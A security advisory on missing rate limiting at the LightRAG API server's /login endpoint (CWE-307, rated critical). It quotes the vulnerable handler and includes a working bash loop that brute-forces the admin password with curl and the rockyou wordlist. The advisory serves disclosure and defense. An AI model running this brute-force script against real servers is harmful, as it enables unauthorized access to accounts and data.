The POST /login endpoint has no rate limiting, account lockout, or delay on failed attempts. An attacker can submit unlimited password guesses at full network speed.
# lightrag/api/lightrag_server.py:2161
@app.post("/login")
async def login(form_data: OAuth2PasswordRequestForm = Depends()):
if not auth_handler.verify_password(username, form_data.password):
raise HTTPException(status_code=401, detail="Incorrect credentials")
# No: rate limit / lockout / backoff / CAPTCHA / attempt counter
A search for slowapi, rate_limit, lockout, or throttle in lightrag/api/ returns zero results.
# Brute-force /login with a wordlist, no throttling
while IFS= read -r pass; do
code=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST http://<TARGET>:9621/login \
-d "username=admin&password=${pass}")
[ "$code" = "200" ] && echo "[FOUND] $pass" && break
done < /usr/share/wordlists/rockyou.txt
Improper restriction of authentication attempts. Any network-reachable attacker can brute-force user passwords without restriction. Once credentials are recovered, the attacker gains full authenticated access to all documents, knowledge graph, and administrative operations.
{
"cwe_ids": [
"CWE-307"
],
"github_reviewed": true,
"github_reviewed_at": "2026-09-22T20:40:22Z",
"nvd_published_at": "2026-09-22T17:17:27Z",
"severity": "CRITICAL"
}